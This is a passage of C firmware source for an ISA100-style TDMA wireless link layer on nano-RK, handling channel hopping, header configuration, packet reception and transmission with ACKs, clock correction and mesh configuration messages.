case 3:
slowPattern[0]=15;
slowPattern[1]=20;
slowPattern[2]=25;
break;
default:
break;
}
}
int8_t isa_ready()
{
if (_isa_ready == 1)
return NRK_OK;
else
return NRK_ERROR;
}
int8_t isa_rx_pkt_set_buffer(uint8_t *buf, uint8_t size)
{
if(size==0 || buf==NULL) return NRK_ERROR;
isa_rfRxInfo.pPayload = buf;
isa_rfRxInfo.max_length = size;
return NRK_OK;
}
int8_t isa_wait_until_rx_pkt()
{
nrk_signal_register(isa_rx_pkt_signal);
if (isa_rx_pkt_check() != 0)
return NRK_OK;
nrk_event_wait (SIG(isa_rx_pkt_signal));
return NRK_OK;
}
int8_t isa_wait_until_rx_or_tx ()
{
nrk_signal_register(isa_rx_pkt_signal);
nrk_signal_register(isa_tx_done_signal);
nrk_event_wait (SIG(isa_rx_pkt_signal) | SIG(isa_tx_done_signal));
return NRK_OK;
}
/**
* isa_init()
*
* This function sets up the low level link layer parameters.
* This starts the main timer routine that will then automatically
* trigger whenever a packet might be sent or received.
* This should be called before ANY scheduling information is set
* since it will clear some default values.
*
*/
uint8_t isa_init (isa_node_mode_t mode, uint8_t id, uint8_t src_id)
{
uint8_t i;
/* Generate signals */
isa_rx_pkt_signal=nrk_signal_create();
if(isa_rx_pkt_signal==NRK_ERROR){
nrk_kprintf(PSTR("ISA ERROR: creating rx signal failed\r\n"));
nrk_kernel_error_add(NRK_SIGNAL_CREATE_ERROR,nrk_cur_task_TCB->task_ID);
return NRK_ERROR;
}
isa_tx_done_signal=nrk_signal_create();
if(isa_tx_done_signal==NRK_ERROR){
nrk_kprintf(PSTR("ISA ERROR: creating tx signal failed\r\n"));
nrk_kernel_error_add(NRK_SIGNAL_CREATE_ERROR,nrk_cur_task_TCB->task_ID);
return NRK_ERROR;
}
// No buffer to start with
isa_rfRxInfo.pPayload = NULL;
isa_rfRxInfo.max_length = 0;
/*FIXME Actually we dont need to always run the high speed timer */
_nrk_high_speed_timer_start();
/* clear everything out */
global_cycle = 0;
global_slot = MAX_ISA_GLOBAL_SLOTS;
_isa_sync_ok = 0;
_isa_join_ok = 0;
slot_expired = 0;
isa_node_mode = mode;
isa_id = id;//change
dmo.dlAddress = id;
isa_clk_src_id=src_id; //change
isa_rx_data_ready = 0;
isa_param.mobile_sync_timeout = 100;
isa_param.rx_timeout = 8000; // 8000 *.125us = 1ms
isa_param.tx_guard_time = TX_GUARD_TIME;
isa_param.channel = 15;
isa_param.mac_addr = 0x1981;
/*
for (i = 0; i < ISA_SLOTS_PER_FRAME; i++) {
isa_sched[i] = 0;
}
isa_tdma_rx_mask = 0;
isa_tdma_tx_mask = 0;
*/
/* Setup the cc2420 chip */
rf_init (&isa_rfRxInfo, isa_param.channel, 0x2421, isa_param.mac_addr);
AFTER_FIRST_SYNC = 1;
/* Setup fisrt hopping channel */
#ifdef CHANNEL_HOPPING
slowIndex=0;
if(id!=1){
channelIndex = src_id;
currentChannel = slottedPattern[channelIndex];
}else{
channelIndex = 0;
currentChannel = slottedPattern[channelIndex];
}
isa_set_channel(currentChannel);
#endif
#ifdef JOIN_PROCESS
if(mode==ISA_GATEWAY){
for(i=22;i<=24;i++){
isa_tx_info[i].pPayload = join_pkt_buf;
isa_tx_info[i].length = PKT_DATA_START+1; // pass le pointer
isa_tx_info[i].DHDR = configDHDR();
isa_tx_data_ready |= ((uint32_t) 1 << i); // set the flag
}
}
#endif
resync_times=0;
dlmoInit(); //Initialize the dlmo data structure
return NRK_OK;
}
void isa_start ()
{
//_isa_clear_sched_cache ();
_isa_ready = 2;
}
/*------------------------------------------------- configDHDR() -----
| Function configDHDR()
|
| Purpose: Configures the DHDR header
|
| Bit - Description
| 10 - DL version (Always 01)
| 2 - Clock recipient 0 - Not DL clock recipient
| 1 - DL clock recipient
| 3 - Include slow hopping offset 0 - no
| 1 - yes
| 4 - Include DAUX 0 - no
| 1 - yes
| 5 - Request EUI-64 0 - no
| 1 - yes
| 6 - Signal Quality is ACK 0 - no
| 1 - yes
| 7 - ACK needed 0 - no ACK/NACK
| 1 - ACK/NACK expected
|
| The configuration of bits in the DHDR header is done based on
| link and neighbor information
|
| Parameters:
| (IN)DLMO_LINK * link - pointer to the link data structure that is used for the current slot
|
| Returns: DHDR
*-------------------------------------------------------------------*/
int8_t configDHDR(DLMO_LINK * link)
{
int8_t DHDR = 1; //lower two bits are always 01
if(link->linkType == TX_NO_ADV){//request ACK/NACK for a TX link only
DHDR |= 1<<7;
}
if(1){//request signal quality in ACK
DHDR |= 1<<6;
}
if(1){//request EUI
DHDR |= 1<<5;
}
if(link->linkType == ADV){//include DAUX if this is an ADV link
DHDR |= 1<<4;
}
if(0){//include slow hopping offset
DHDR |= 1<<3;
}
if(ISAMASK(link->neighbor->typeInfo, CLOCK_PREFERRED) == CLOCK_PREFERRED){ //is clock recipient
/*
* The link points to a neighbor that is configured
* for it. This checks if that neighbor is our clock source or not.
* If it is, then we should request for clock correction
*/
DHDR |= 1<<2;
}
return DHDR;
}
/*------------------------------------------------- configDHR() -----
| Function configDHR()
|
| Purpose: Configures the DHR header
|
| Bit - Description
| 10 - Reserved (Always 11)
| 2 - Reserved (0)
| 3 - Auxiliary sub-header 0 - no DAUX
| 1 - DAUX inlcuded
| 54 - ACK/NACK type 0 - ACK
| 1 - ACK/ECN
| 2 - NACK0
| 3 - NACK1
| 6 - Include slow hopping timeslot 0 - no
| offset 1 - yes
|
| 7 - Include clock correction 0 - no
| 1 - yes
|
| This configures the DHR header based on the incoming messages DHDR header. If we are providing clock correction
| the clock correction bit is set. Rest is yet to be implemented
|
| Parameters:
| (IN)clockCorrection - used to decide whether to set the clock correction bit
| (IN)nack - used to set the ACK/NACK(54) bits
|
| Returns: DHDR
*-------------------------------------------------------------------*/
int8_t configDHR(uint8_t clockCorrection,uint8_t nack)
{
int8_t DHR = 3;
if(clockCorrection){//include clock correction change
DHR |= 1<<7;
}
if(0){//including slow-hopping timeslot offset
DHR |= 1<<6;
}
DHR |= nack<<4; //what type of ACK/NACK is this?
if(0){//include slow hopping offset
DHR |= 1<<3;
}
return DHR;
}
/**
* configAdvDAUX()
*
* Gateway could config the DAUX
* DAUX contains superframe and join information
*
*/
void configAdvDAUX(uint8_t chPattern, uint8_t chIndex, uint8_t sp_period, uint8_t tx_slot1, uint8_t tx_slot2, uint8_t tx_slot3, uint8_t tx_slot4, uint8_t rx_slot1, uint8_t rx_slot2, uint8_t rx_slot3, uint8_t rx_slot4)
{
/*ADVERTISEMENT SELECTION*/
DAUX[0]=0; // Advertisement selection, 0 indicates advertisement DAUX
/*TIME SYNCHRONIZATION*/
/* 1-6 bytes are reserved for time synchronization */
/*SUPERFRAME INFORMATION*/
DAUX[7]=10; // timeslot duration, currently not used.
DAUX[8]=0; // reserved for long timeslot duration
DAUX[9]=chPattern; // channel pattern selection
DAUX[10]=chIndex; // channel index selection
DAUX[11]=sp_period; // superframe period
DAUX[12]=0; // reserved for long period situation
/* 13 reserved for superframe cycle starting point
14 reserved of the length of slow hopping period
15 and 16 reserved for channel hopping channel map for spectrum management
*/
/*JOIN INFORMATION*/
/* 17 reserved for Join backoff and timeout
18 reserved for Indicates fields that are transmitted
*/
DAUX[19]=tx_slot1; //TX slot 1
DAUX[20]=tx_slot2; //TX slot 2
DAUX[21]=tx_slot3; //TX slot 3
DAUX[22]=tx_slot4; //TX slot 4
DAUX[23]=rx_slot1; //RX slot 1
DAUX[24]=rx_slot2; //RX slot 2
DAUX[25]=rx_slot3; //RX slot 3
DAUX[26]=rx_slot4; //RX slot 4
/*INTEGRETY CHECK*/
/* 27 and 28 are reserved for Integrety check*/
}
/**
* isa_check_rx_status()
*
* This function returns if there is a packet in the link layer
* rx buffer. Once a packet has been received, it should be quickly
* processed or moved and then rtl_release_rx_packet() should be called.
* rtl_release_rx_packet() then resets the value of rtl_check_rx_status()
*
* Returns: 1 if a new packet was received, 0 otherwise
*/
int8_t isa_rx_pkt_check()
{
return isa_rx_data_ready;
}
/**
* isa_rx_pkt_get()
*
* This function returns the rx buffer point. It should be called
* once a packet is received and must be followed by isa_release_rx_packet().
* isa_release_rx_packet() then resets the value of isa_check_rx_status().
*
* Returns: rx buffer point
*/
uint8_t* isa_rx_pkt_get (uint8_t *len, int8_t *rssi)
{
if(isa_rx_pkt_check()==0){
*len=0;
*rssi=0;
return NULL;
}
*len=isa_rfRxInfo.length;
*rssi=isa_rfRxInfo.rssi;
return isa_rfRxInfo.pPayload;
}
/**
* _isa_rx()
*
* This is the low level RX packet function. It will read in
* a packet and buffer it in the link layer's single RX buffer.
* This buffer can be checked with rtl_check_rx_status() and
* released with rtl_release_rx_packet(). If the buffer has not
* been released and a new packet arrives, the packet will be lost.
* This function is only called from the timer interrupt routine.
*
* Arguments: slot is the current slot that is actively in RX mode.
*/
void _isa_rx (DLMO_LINK * link, uint8_t slot)
{
uint8_t DHDR; // Data link layer header sub-header, currently used as ACK control
NEIGHBOR_TABLE* neighborTable;
CONFIG_NEIGHBOR* configNeighbor;
CONFIG_GRAPH* configGraph;
CONFIG_LINK* configLink;
CANDIDATE* candidate;
uint8_t i;
//putchar('R');
uint8_t n;
uint32_t node_mask;
uint16_t destAddr;
volatile uint8_t timeout;
MESSAGE* message;
bool TransmitLinkPresent = false;
uint8_t nack = 0;// NACK
#ifdef LED_DEBUG
nrk_led_set(1);
#endif
rf_set_rx (&isa_rfRxInfo, isa_param.channel); // sets rx buffer and channel
rf_polling_rx_on ();
nrk_gpio_set(NRK_DEBUG_2);
// Timing for waiting for sfd
timeout = _nrk_os_timer_get();
timeout+=4; // 4ms
n = 0;
//nrk_gpio_set(NRK_DEBUG_3);
while ((n = rf_rx_check_sfd()) == 0) {
if (_nrk_os_timer_get() > timeout) {
//spend too much time on waiting for a pkt's arrival
nrk_gpio_clr(NRK_DEBUG_2);
rf_rx_off ();
#ifdef LED_DEBUG
nrk_led_clr(1);
#endif
#ifdef RX_DEBUG
// nrk_gpio_set(NRK_DEBUG_2);
// nrk_gpio_clr(NRK_DEBUG_2);
//putchar('v');
//printf("%d", slot);
//printf("sfd times out.\n\r");
#endif
// packetsLost++;
return;
}
}
//printf("%d\n\r",_nrk_high_speed_timer_get());
// sfd received, start receiving packet and record start time
rx_start_time = _nrk_high_speed_timer_get();
//nrk_gpio_set(NRK_DEBUG_1);
// nrk_gpio_clr(NRK_DEBUG_1);
// Timing for waiting for finishing packet receiving
timeout = _nrk_os_timer_get();
timeout += 5; // 5ms
if (n != 0) {
n = 0;
// printf("Packet on its way\n\r");
while ((n = rf_polling_rx_packet (false,128)) == 0) {
//printf("%d\n\r",_nrk_os_timer_get());
if (_nrk_os_timer_get () > timeout) {
#ifdef RX_DEBUG
printf("packet is too long, times out.\n\r");
#endif
// packetsLost++;
// spend too much time on receiving pkt.
return; // huge timeout as fail safe
}
}
}
nrk_gpio_clr(NRK_DEBUG_2);
// printf("%d", currentChannel);
rf_rx_off ();
if (n !=1){ //size of packet must have been wrong
putchar('b');
printf("Channel %d\r\n",currentChannel);
// packetsLost++;
}
if (n == 1) {// successfully received packet
rxCount++;
nrk_led_toggle(BLUE_LED);
//If I am the destination
destAddr = isa_rfRxInfo.pPayload[DEST_INDEX];
//potential problem: if repeater or recipient receives noise, the DHDR would be changed. And it is highly possible that the highest bit of DHDR would be set to 0
//if(isa_node_mode != ISA_GATEWAY)
DHDR = isa_rfRxInfo.pPayload[DHDR_INDEX];
message = &isa_rfRxInfo.pPayload[PKT_DATA_START];
#ifdef RX_DEBUG
// printf("Repeater slot = %d, local slot is %d.\n\r", isa_rfRxInfo.pPayload[SLOT_INDEX],global_slot);
#endif RX_DEBUG
nrk_event_signal(isa_rx_pkt_signal);
node_mask = ((uint32_t) 1) << isa_rfRxInfo.pPayload[SRC_INDEX];
if(DHDR & (1<<4))// if advertisement, add into candidate table and return
{
//printf("S:%d\r\n",isa_rfRxInfo.pPayload[SRC_INDEX]);
//putchar('w');
if (addCandidate(isa_rfRxInfo.pPayload[SRC_INDEX]) == ISA_ERROR){
printIsaError();
}
isa_rx_pkt_release();
return;
//printf("Received advertisement \r\n");
}
else if(DHDR & (1<<7)){ //if ACK is required
txCount++;
// Transmit ACK packet
//If the packet is meant for me or to a node I have a transmit link to, I send an acknowledge
if((TransmitLinkPresent=isTransmitLinkPresent(isa_rfRxInfo.pPayload)) || (dmo.dlAddress == destAddr))
{
nack = 0;
}
else
{
nack = 3; // NACK1 because of difficulties downstream
}
DHR = configDHR(DHDR & (1<<2),nack); //configure DHRto include clock correction based on the DHDR bit
// printf("%d", DHR);
isa_ack_buf[DHR_INDEX]= DHR;
#ifdef ACK_DEBUG
//printf("DHDR is %x.\n\r",DHDR);
#endif
isa_ack_tx.pPayload = isa_ack_buf;
if (DHDR & (1<<2)) { //reply ACK with time offsetX
// putchar ('K');
offsetX = rx_start_time - slot_start_time;
//printf("slot_start_time is %d,rx_start_time is %d.\n\r",slot_start_time,rx_start_time);
uint8_t temp1,temp2;
temp1 = (offsetX & 0xFF00)>>8;
isa_ack_buf[OFFSET_HIGH]=temp1;
temp2 = (offsetX & 0x00FF);
isa_ack_buf[OFFSET_LOW]=temp2;
#ifdef ACK_DEBUG
// printf("offsetX is %d\n\r", offsetX);
#endif
//isa_ack_tx.length = PKT_DATA_START + 1;
isa_ack_tx.length = 4;
}
else
{ // recipient , only reply explicit ACK
//isa_ack_tx.length = PKT_DATA_START-1;
isa_ack_tx.length = 2;
//putchar ('C');
//putchar('\n');
}
nrk_gpio_set(NRK_DEBUG_2);
rf_tx_tdma_packet (&isa_ack_tx,slot_start_time,isa_param.tx_guard_time,&tx_start_time);
nrk_gpio_clr(NRK_DEBUG_2);
// printf ("Tx :%d| ", isa_rfRxInfo.length);
}
//This will be a normal TX packet if we have reached this point
//If it is a neighbor table report then we can forward it to our clock source
//If I am the gateway then I don't forward it to anyone
if (message->type == DUMMY_PAYLOAD){
if (destAddr == dmo.dlAddress) {
dd_data_indication(isa_rfRxInfo.pPayload[SRC_INDEX] , destAddr,0,0, 0, 0, isa_rfRxInfo.pPayload);
}
else{
//if the dest address is not mine, then add into the queue to forward provided we have a link to forward for that graph. If a graph is not
// configured in the message then we should at least have a link to the dest neighbor
// if (isTransmitLinkPresent(isa_rfRxInfo.pPayload)){
//if yes, then place the message on the Queue again
if(TransmitLinkPresent == true){
enQueue (destAddr, 0, isa_rfRxInfo.length, isa_rfRxInfo.pPayload, NULL);
printf("packet forwarded to %d\r\n", destAddr);
isa_rx_pkt_release();
}
else{
printf("No Transmit Link for this test message for %d - dropped\r\n", destAddr);
isa_rx_pkt_release();
}
}
}
else if (message->type==ADD_NEIGHBOR)
{
// printf("Received configure Neighbor data form %d\r\n",isa_rfRxInfo.pPayload[SRC_INDEX]);
if(destAddr == dmo.dlAddress)
{
configNeighbor = &message->data;
addNeighbor(configNeighbor->neighborId,0,0,0,false,0,0,0);
isa_rx_pkt_release();
setNewDisplay(12, destAddr-1);
}
else
{
//if (isTransmitLinkPresent(isa_rfRxInfo.pPayload)){
if(TransmitLinkPresent == true){
//if yes, then place the message on the Queue again
enQueue (destAddr, 0, isa_rfRxInfo.length, isa_rfRxInfo.pPayload, NULL);
// printf("packet forwarded to %d", destAddr);
isa_rx_pkt_release();
setNewDisplay(12, destAddr-1);
}
else{
printf("No Transmit Link for Add Neighbor Message for %d- dropped\r\n", destAddr);
isa_rx_pkt_release();
}
}
}
else if(message->type==ADD_GRAPH)
{
// printf("Received configure Graph data form %d\r\n",isa_rfRxInfo.pPayload[SRC_INDEX]);
if(destAddr == dmo.dlAddress)
{
configGraph = &message->data;
addGraph(configGraph->graphId,configGraph->neighborCount,configGraph->neigh1,configGraph->neigh2,configGraph->neigh3);
isa_rx_pkt_release();
setNewDisplay(9, destAddr-1);
}
else
{
//if (isTransmitLinkPresent(isa_rfRxInfo.pPayload)){
if(TransmitLinkPresent == true){
//if yes, then place the message on the Queue again
enQueue (destAddr, 0, isa_rfRxInfo.length, isa_rfRxInfo.pPayload, NULL);
// printf("packet forwarded to %d", destAddr);
isa_rx_pkt_release();
setNewDisplay(9, destAddr-1);
}
else{
printf("No Transmit link for graph config for %d- dropped", destAddr);
isa_rx_pkt_release();
}
}
}
else if(message->type==ADD_LINK)
{
// printf("Received configure Link data form %d\r\n",isa_rfRxInfo.pPayload[SRC_INDEX]);
if(destAddr == dmo.dlAddress)
{
configLink = &message->data;
addLink(configLink->slotNumber,configLink->neighborId,configLink->graphId,configLink->linkType,configLink->graphType);
isa_rx_pkt_release();
setNewDisplay(11, destAddr-1);
}
else
{
// if (isTransmitLinkPresent(isa_rfRxInfo.pPayload)){
if(TransmitLinkPresent == true){
//if yes, then place the message on the Queue again
enQueue (destAddr, 0, isa_rfRxInfo.length, isa_rfRxInfo.pPayload, NULL);
// printf("packet forwarded to %d", destAddr);
isa_rx_pkt_release();
setNewDisplay(11, destAddr-1);
}
else{
printf("No Transmit Link for Add link message for %d- dropped", destAddr);
isa_rx_pkt_release();
}
}
}
else if (message->type==NEIGHBOR_TABLE_REPORT){ //if it is a neighbor table report,
if (isa_node_mode==ISA_GATEWAY){
//array[SRC_INDEX] |= ((uint16_t)1<<candidate->neighbor);
printf ("Received Candidate Table frm %d\r\n",isa_rfRxInfo.pPayload[SRC_INDEX]);
//need to print the neighbor info now
neighborTable = &message->data; //cast to neighbor Table
candidate = &neighborTable->candidate;
adjacencyMatrix[isa_rfRxInfo.pPayload[SRC_INDEX]] = 0;
for (i = 0; i < neighborTable->numberOfNeighbors; i++){
adjacencyMatrix[isa_rfRxInfo.pPayload[SRC_INDEX]] |= ((uint16_t)1<<candidate->neighbor);
//printf ("\t%d", candidate->neighbor);
candidate++;
}
putchar('\n');
putchar('\r');
putchar('n');
isa_rx_pkt_release();
}
else{ // if I am not the gateway, forward to my clock source
enQueue (isa_clk_src_id, 0, isa_rfRxInfo.length, isa_rfRxInfo.pPayload, NULL);
isa_rx_pkt_release();
setNewDisplay(13, isa_rfRxInfo.pPayload[SRC_INDEX]-1);
}
}
else if(message->type==FLUSH_CANDIDATE_TABLE)
{
printf("Received flush candidate table %d\r\n",isa_rfRxInfo.pPayload[SRC_INDEX]);
if(destAddr == dmo.dlAddress)
{
flushCandidateEntries();
isa_rx_pkt_release();
}
else
{
if (isTransmitLinkPresent(isa_rfRxInfo.pPayload)){
//if yes, then place the message on the Queue again
enQueue (destAddr, 0, isa_rfRxInfo.length, isa_rfRxInfo.pPayload, NULL);
// printf("packet forwarded to %d", destAddr);
isa_rx_pkt_release();
}
else{
printf("No Transmit link for Flush message for %d- dropped\r\n", destAddr);
isa_rx_pkt_release();
}
}
}
else printf ("Unknown message type\r\n");
//nrk_gpio_clr(NRK_DEBUG_3);
}
#ifdef LED_DEBUG
nrk_led_clr (1);
#endif
}
/**
* isa_release_rx_packet()
*
* This function releases the link layer's hold on the rx buffer.
* This must be called after a packet is received before a new
* packet can be buffered! This should ideally be done by the
* network layer.
*
*/
void isa_rx_pkt_release()
{
isa_rx_data_ready = 0;
}
/**
* _isa_tx()
*
* This function is the low level TX function.
* It is only called from the timer interrupt and fetches any
* packets that were set for a particular slot by rtl_tx_packet().
*
* Arguments: slot is the active slot set by the interrupt timer.
*/
void _isa_tx (DLMO_LINK * link, uint16_t slot)
{
uint8_t DHDR; // Data link layer header sub-header, currently used as ACK control
uint8_t c;
uint8_t n;
uint8_t i;
int8_t tmp;
volatile uint8_t timeout;
volatile uint8_t offsetSec, curSec;
volatile uint16_t offsetNanoSec;
volatile int16_t time_correction, time_correction1;
uint8_t tmp_nrk_prev_timer_val;
volatile ISA_QUEUE *transmitEntry;
// load header
isa_rfTxInfo.cca = true;
//the link should be a transmit link and either have a neighbor configured or a graph configured
if(link->linkType == TX_NO_ADV )
{
MESSAGE* message;
//if (check==5) nrk_terminate_task();//Azriel killed after 5 transmits
//find if there is anything in the Queue to be transmitted
transmitEntry = getHighPriorityEntry(link);
if (transmitEntry == NULL){
//printf("Nothing in the queue to transmit on slot %d ", slot);
return;
}
previous_tx_slot = slot;
isa_rfTxInfo.pPayload = transmitEntry->tx_buf;
#ifdef TX_DEBUG
//printf("TX Payload is: %s.\n\r", isa_rfTxInfo.pPayload);
#endif
isa_rfTxInfo.length=transmitEntry->length;
DHDR = configDHDR(link);
isa_rfTxInfo.pPayload[DHDR_INDEX] = DHDR;
//isa_rfTxInfo.pPayload[SLOT_INDEX] = (uint8_t)(global_slot & 0xFF);
//Change the src id only if not neighbor table
message = &isa_rfTxInfo.pPayload[PKT_DATA_START];
if (message->type != NEIGHBOR_TABLE_REPORT)isa_rfTxInfo.pPayload[SRC_INDEX] = isa_id; //replace the source id only if it is not a neighbor table report
else if (message->type == NEIGHBOR_TABLE_REPORT){
//do nothing
}
transmitEntry->numTries++;
#ifdef JOIN_PROCESS
if(slot>=22 && isa_node_mode == ISA_GATEWAY){
for(i=0;i<29;i++){
isa_rfTxInfo.pPayload[DAUX_INDEX+i]=DAUX[i];
//printf("DAUX[%d]=%d\r\n",i,isa_rfTxInfo.pPayload[DAUX_INDEX+i]);
}
}
#endif
}
else if(link->linkType == ADV)
{
//putchar('a');
//nrk_gpio_set(NRK_DEBUG_1);
isa_rfTxInfo.pPayload = adv_buf;
isa_rfTxInfo.length = DAUX_INDEX + sizeof(DLMO_DAUX) + 1; //sizeof(DLMO_DAUX) should be 21
//isa_rfTxInfo.length = DHDR_INDEX + sizeof(uint8_t) + 1;
DHDR = configDHDR(link);
isa_rfTxInfo.pPayload[DHDR_INDEX] = DHDR;
isa_rfTxInfo.pPayload[SRC_INDEX] = isa_id;//changeisa_rfTxInfo.pPayload[SLOT_INDEX] = (uint8_t)(global_slot & 0xFF);
isa_rfTxInfo.pPayload[SLOT_INDEX] = (uint8_t)(global_slot & 0xFF);
DLMO_DAUX* advertise;
advertise = isa_rfTxInfo.pPayload[DAUX_INDEX];
advertise->adSelection = 0;
//nrk_gpio_clr(NRK_DEBUG_1);
}
// FIXME a small bug. should not happen and should be fixed in _isa_init_sync()
//if(AFTER_FIRST_SYNC == 1){
_nrk_high_speed_timer_reset();
nrk_high_speed_timer_wait(0,WAIT_TIME_BEFORE_TX);
//AFTER_FIRST_SYNC = 0;
//}
#ifdef TX_RX_DEBUG
nrk_gpio_set(NRK_DEBUG_1);
//printf("T\r\n");
#endif
if(rf_tx_tdma_packet (&isa_rfTxInfo,slot_start_time,isa_param.tx_guard_time,&tx_start_time))
{
//if(link->linkType==TX_NO_ADV)transmitEntry->transmitPending = false;
txCount++;//change for packet loss
nrk_gpio_clr(NRK_DEBUG_1);
nrk_led_toggle(RED_LED);
// putchar ('t');
//("rx_start_time is %d.\n\r",_nrk_high_speed_timer_get());
offsetY = tx_start_time - slot_start_time;
// printf("%d.\n\r",offsetY);
#ifdef HIGH_TIMER_DEBUG
//printf("In isa.c _isa_tx(): offsetY is %d, tx_start_time is %d\n\r",offsetY,tx_start_time);
#endif
}
nrk_event_signal (isa_tx_done_signal);
// ACK required
if(DHDR & (1<<7)) { //&& isa_node_mode!=ISA_GATEWAY){ //Azriel
rf_polling_rx_on ();
nrk_gpio_set(NRK_DEBUG_1);
_nrk_high_speed_timer_reset();
nrk_high_speed_timer_wait(0,CPU_PROCESS_TIME);
//nrk_gpio_set(NRK_DEBUG_1);
// Timing for waiting for receiving ACK
timeout = _nrk_os_timer_get();
timeout+=2; // 2ms
n = 0;
while ((n = rf_rx_check_sfd()) == 0) {
if (_nrk_os_timer_get() > timeout) {
tmp = slot - previous_tx_slot;
if(slot == previous_tx_slot)
slot_expired += 25;
else{
tmp = slot - previous_tx_slot;
if(tmp>0)
slot_expired += tmp;
else
slot_expired += 25+tmp;
}
//printf("%d,%d,%d,%d,%d\n\r",slot_expired,tmp_curSec,tmp_offsetSec,tmp_offsetNanoSec,++tmp_count);
//printf("%d,%d\n\r",slot_expired,isa_param.channel);
//printf("%d,%d,%d\n\r",slot_expired,slot,previous_tx_slot);
//spend too much time on waiting for a pkt's arrival
rf_rx_off ();
nrk_gpio_clr(NRK_DEBUG_1);
#ifdef LED_DEBUG
nrk_led_clr(1);
#endif
#ifdef RX_DEBUG
putchar('s');
// printf("%d", slot);
// printf("sfd times out.\n\r");
#endif
//nrk_gpio_clr(NRK_DEBUG_1);
packetsLost++;
if(transmitEntry->numTries >= MAX_RETRIES){
if (transmitEntry-> slot_callback == NULL ) isaFreePacket(transmitEntry);
else transmitEntry-> slot_callback(transmitEntry, FAILURE);
}
return;
}
}
//nrk_gpio_clr(NRK_DEBUG_1);
timeout = _nrk_os_timer_get();
timeout += 2; // 5ms
if (n != 0) {
n = 0;
//printf("Packet on its way\n\r");
if ( BITGET(DHDR,2)) c = 4 ;
else c = 2;
while ((n = rf_polling_rx_packet (true, c)) == 0) { //changed to 2 by Azriel for gateway
if (_nrk_os_timer_get () > timeout) {
#ifdef RX_DEBUG
printf("packet is too long, times out.\n\r");
#endif
packetsLost++;
tmp_curSec = _nrk_os_timer_get();
if(transmitEntry->numTries == MAX_RETRIES){
if (transmitEntry-> slot_callback == NULL ) isaFreePacket(transmitEntry);
else transmitEntry-> slot_callback(transmitEntry, FAILURE);
// spend too much time on receiving pkt.
}
return; // huge timeout as fail safe
}
//if(n==-6)
// printf("%d\n\r",_nrk_os_timer_get());
}
}
if (n !=1){ //size of packet must have been wrong
putchar('f');
printf("f channel %d\r\n",currentChannel);
packetsLost++;
}
rf_rx_off ();
// if (n==1)
nrk_gpio_clr(NRK_DEBUG_1);
if (n == 1) {// successfully received ACK
rxCount++;
//isa_rx_data_ready = 1;
DHR = isa_rfRxInfo.pPayload[DHR_INDEX];
#ifdef ACK_DEBUG
#endif ACK_DEBUG
if((DHDR & (1<<7))) { // &&isa_node_mode!=ISA_GATEWAY){
slot_expired = 0;
// ************************* Trying time correction
if(DHR & (1<<7)){
offsetX = ((0x0000|isa_rfRxInfo.pPayload[OFFSET_HIGH])<<8)&0xff00 + 0x0000|isa_rfRxInfo.pPayload[OFFSET_LOW];
#ifdef ACK_DEBUG
nrk_led_toggle(ORANGE_LED);
// putchar('a');
#endif ACK_DEBUG
// check++;
time_correction = offsetX - offsetY - 1400;
//-1400 is the error in reading used for calculating the offset
#ifdef HIGH_TIMER_DEBUG
printf("time correction is %d.\n\r", time_correction);
#endif
// printf("%d.\n\r", time_correction);
timeout=50;
if(time_correction >= 0){
curSec = _nrk_os_timer_get();
offsetSec = (time_correction/7325)+1;
offsetNanoSec = 7325-(time_correction%7325); //This should not be called nanoseconds because it is NOT!!!
_nrk_os_timer_stop();
// nrk_gpio_set(NRK_DEBUG_1);
_nrk_high_speed_timer_reset();
nrk_high_speed_timer_wait(0,offsetNanoSec);
_nrk_os_timer_set(curSec+offsetSec);
// nrk_gpio_clr(NRK_DEBUG_1);
_nrk_os_timer_start();
// _nrk_set_next_wakeup(10);
nrk_spin_wait_us(50);
}else if(time_correction<0){
_nrk_os_timer_stop();
#ifdef CORRECTION
nrk_gpio_set(NRK_DEBUG_2);
//nrk_high_speed_timer_wait(0,22800); // for test
nrk_gpio_clr(NRK_DEBUG_2);
#endif
_nrk_high_speed_timer_reset();
nrk_high_speed_timer_wait(0,-time_correction);
_nrk_os_timer_start();
}
}
}
//Checking the 4th and 5th bit of the DHR to see if the incoming acknowledgment is 0. If not, some error has occured and i shouldn't remove
//from the message queue
if(transmitEntry->numTries == MAX_RETRIES || ((DHR & (3<<4))==0)){
if (transmitEntry-> slot_callback == NULL ) isaFreePacket(transmitEntry);
else transmitEntry-> slot_callback(transmitEntry, SUCCESS);
}
}
}//wait for ACK
}
/*
uint8_t _isa_join_process ()
{
int8_t n;
uint16_t timeout;
uint16_t timer;
uint8_t tdma_start_tick;
uint8_t battery_save_cnt;
uint8_t last_nrk_tick;
uint8_t i;
timer=0;
battery_save_cnt=0;
while(1)
{
rf_set_rx (&isa_rfRxInfo, isa_param.channel); // sets rx buffer and channel
rf_polling_rx_on ();
n = 0;
_isa_sync_ok = 0;
last_nrk_tick=0; // should be 0 going in
//_nrk_prev_timer_val=250;
//_nrk_set_next_wakeup(250);
//_nrk_os_timer_set(0);
//timeout=200;
while ((n = rf_rx_check_sfd()) == 0) {
// every OS tick
if(last_nrk_tick!=_nrk_os_timer_get()) {
last_nrk_tick=_nrk_os_timer_get();
timer++;
if(timer>ISA_TOKEN_TIMEOUT){
timer=0;
break;
}
}
}
//_nrk_high_speed_timer_reset();
tdma_start_tick=_nrk_os_timer_get();
timeout = tdma_start_tick+4;
// an interrupt could happen in here and mess things up
if (n != 0) {
n = 0;
// Packet on its way
while ((n = rf_polling_rx_packet (false,128)) == 0) {
if (_nrk_os_timer_get () > timeout)
{
//nrk_kprintf( PSTR("Pkt timed out\r\n") );
break; // huge timeout as failsafe
}
}
}
rf_rx_off ();
if (n == 1){ //&& isa_rfRxInfo.length>0) {
// if(isa_rfRxInfo.pPayload[SRC_INDEX]==isa_clk_src_id){//change
// CRC and checksum passed
if(isa_rfRxInfo.pPayload[DAUX_INDEX+7]==10){ // DAUX packet
isa_rx_data_ready = 1;
//global_slot = (volatile)isa_rfRxInfo.pPayload[SLOT_INDEX];
isa_set_channel_pattern(isa_rfRxInfo.pPayload[DAUX_INDEX+9]); //set channel hopping pattern
channelIndex=isa_rfRxInfo.pPayload[DAUX_INDEX+10];
currentChannel = slottedPattern[channelIndex];
isa_set_channel(currentChannel);
for(i=0;i<4;i++){ // set tx slots
if(isa_rfRxInfo.pPayload[DAUX_INDEX+19+i]==0)
break;
else{
isa_tdma_tx_mask |= ((uint32_t) 1) << isa_rfRxInfo.pPayload[DAUX_INDEX+19+i];
isa_sched[isa_rfRxInfo.pPayload[DAUX_INDEX+19+i]] = 1;
tx_slot_from_join[i]=isa_rfRxInfo.pPayload[DAUX_INDEX+19+i];
